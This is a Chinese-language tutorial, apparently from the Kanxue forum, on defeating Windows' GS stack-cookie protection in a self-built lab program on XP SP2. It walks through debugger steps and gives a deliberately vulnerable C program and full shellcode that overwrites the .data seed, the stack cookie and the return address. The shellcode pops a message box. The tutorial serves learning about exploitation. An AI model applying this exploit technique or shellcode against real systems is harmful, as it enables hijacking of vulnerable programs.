查看原文
其他

同时替换栈和.data数据节中的Cookie突破GS安全机制

大晟 看雪学院 2019-05-26



这段时间在学习windows平台的漏洞知识,前几天弄明白了GS,写下来与大家分享,希望对像我一样的初学者有帮助^_^。


实验环境:XPSP2,VS2008(禁用优化选项),build版本:release版本;

工具:OD,IDA。

参考书籍:《0day2:软件漏洞分析技术》第二版

      

首先说明一下GS的来源:针对缓冲区溢出时覆盖函数返回地址这种情况,微软在编译程序是加入了一个安全校验选项—GS。


基本的使用方法是这样:函数调用发生的时候系统为该函数开辟一个新的栈帧,然后参数,返回地址,EBP入栈,之后再在EBP的上方加入一个双字大小的随机数,称为Security Cookie,这个随机数是用来自.data数据节中的开头四个字节(种子)与EBP异或得到,因为程序每次运行的时候种子都是随机的,所以Security Cookie也是随机的。


最后在函数准备返回之前,将Security Cookie与EBP异或,再与.data的种子比较,如果二者相同,函数正常返回。


如果Security Cookie的值被溢出的数据覆盖,那它与EBP异或的结果也就不会跟种子一样,Security Cookie就是用来防止栈溢出被利用。GS使得栈溢出利用的难度提高了很多,但也不是完全没有办法。


通过学习GS的原理可以知道,函数要正常返回需要满足的条件是:函数在返回之前Security Cookie xor EBP == 种子。


由此可以做一个假设,在函数返回之前同时修改 Security Cookie 和.data数据节的种子,使得函数返回的时候;Security Cookie xor EBP == 种子,就可以突破GS了。

     

这里我们编写一个存在栈溢出的程序来说明这种方法。栈溢出需要关注的有这么几个位置,产生溢出的数组(缓冲区)的位置,函数返回地址,这里还需要知道 Security Cookie 的位置和.data数据节种子的位置。先把这几个位置确定了再来组织shellcode。这里先用8个字节的NOP填充缓冲区。


#include <stdafx.h>
#include <string.h>
#include <stdlib.h>
char shellcode[]="\x90\x90\x90\x90"//用NOP修改种子
"\x90\x90\x90\x90";
void test(char * str, int i, char * src)
{
      char dest[200];
      if(i<0x9995)
      {
             char * buf=str+i;//指向.data,i的值是main函数中申请的内存的起始地址到种子的距离
             *buf=*src;//修改.data的第一个字节
             *(buf+1)=*(src+1); //修改.data的第二个字节
             *(buf+2)=*(src+2); //修改.data的第三个字节
             *(buf+3)=*(src+3); //修改.data的第四个字节
          strcpy(dest,src);//这个函数产生溢出
      }
}
void main()
{
      char * str=(char *)malloc(0x10000);//申请一片内存,并用test函数来使用
      test(str,0xFFFF2FB8,shellcode);  
}

      

将这段程序按实验环境要求编译生成一个可执行程序,载入IDA,Ctrl+L得知main函数的位置是0x004010E0。再载入OD中,Ctrl+G输入0x004010E0,来到main函数的入口,

     

在OD中可以看到main函数中的两个函数。在0x004010E0下一个断点,然后F9运行到断点处,接着F8直接步过malloc()函数,在EAX中可以看到由malloc()申请的内存的起始位置是0x00410048。




      

接着F8执行到test函数,缓冲区溢出发生在test函数,这里就要F7跟进去,在OD中右下角的栈区可以看到test函数的从右向左依次入栈的参数: 


shellcode 的地址 0x00403018,0xFFFF2FB8 和一开始申请的内存的起始地址0x00410048。接着是函数返回地址 0x00401108,在左上角的反汇编窗口中可以在 0x00401013 处看到 “if i<0x9995” 对应的汇编指令。



      

在 0x00401009 的指令将.data开头四个字节的值,也就是种子的值赋给EAX,再与EBP异或,得到 Security Cookie=0xF60A313E,并放在EBP的上面,这个时候再去test函数的栈中查看,发现EBP的上面多了一个0xF60A313E,这个值就是Security Cookie。


到现在函数返回地址,.data数据节的起始位置,和 Security Cookie 的位置都已经知道,再往下执行就会发现缓冲区的位置,这里就是dest数组。



      

前面已经知道了种子的位置是 0x00403000,也知道了main函数中malloc函数申请的内存的起始地址是 0x00410048,位置差为 FFFF2FB8(十进制的-53320),代码中 char * buf=str+i 这一句的作用就是根据这个差值找到种子的位置,接着将al的值赋为NOP(0x90),然后通过al开始修改 0x00403000 处的种子的值



     

接着是将 shellcode 数组的8个NOP传给test函数中的数组dest,可以在右下角的栈中看到 0x0012FE94 是dest数组在栈中的位置。自此,我们需要的几个位置都知道了; 



     

接下来重新组织shellcode。


#include <stdafx.h>
#include <string.h>
#include <stdlib.h>
char shellcode[]="\x90\x90\x90\x90"//用NOP修改种子
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"//这个shellcode用来弹出一个消息框
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xF4\x6F\x82\x90"//result of \x90\x90\x90\x90 xor EBP
"\x90\x90\x90\x90"
"\x94\xFE\x12\x00"//address of shellcode";
void test(char * str, int i, char * src)
{
       char dest[200];
       if(i<0x9995)
       {
              char * buf=str+i;//指向.data
              *buf=*src;//修改.data的第一个字节
              *(buf+1)=*(src+1); //修改.data的第二个字节
              *(buf+2)=*(src+2); //修改.data的第三个字节
              *(buf+3)=*(src+3); //修改.data的第四个字节
           strcpy(dest,src);//这个函数产生溢出
       }
}
void main()
{
       char * str=(char *)malloc(0x10000);
       test(str,0xFFFF2FB8,shellcode);  
}

       

我们知道。Shellcode是通过strcpy函数传给dest数组的,所以要将test函数的返回地址覆盖为dest数组的位置,在这里就是0x0012FE94;


因为每次程序运行的时候.data数据节的种子都会变化,所以用 Shell code 的开头四个字节改写种子的值为四个NOP,EBP上面的 Security Cookie 应该被修改为NOP与EBP异或后的值,这样在test函数返回的时候 Security Cookie 与EBP异或得到NOP,再与.data数据节的种子比较就能通过验证,函数就可以“正常”返回。


同时,函数的返回地址已经被覆盖为dest数组的位置,也就是shellcode的位置,这样就能劫持程序流程,执行shellcode。


现在将代码中的 shellcode[] 数组的值填充为组织好的shellcode,再编译为新的可执行程序,然后向之前做的一样,在OD中可以看到:


dest数组的起始位置还是 0x0012FE94,而 0x0012FF68 处的test函数返回地址已经被 0x0012FE94 覆盖,EBP上面 Security Cookie 的值也被修改为NOP与EBP异或的值。




     

函数返回后EIP指针就到0x0012FE94执行shellcode了:



     

Shellcode被顺利执行,这个shellcode的作用是弹出一个对话框,说明GS被突破了。






本文由看雪论坛 大晟 原创

转载请注明来自看雪社区




往期热门阅读:




扫描二维码关注我们,更多干货等你来拿!


    您可能也对以下帖子感兴趣

    文章有问题?点此查看未经处理的缓存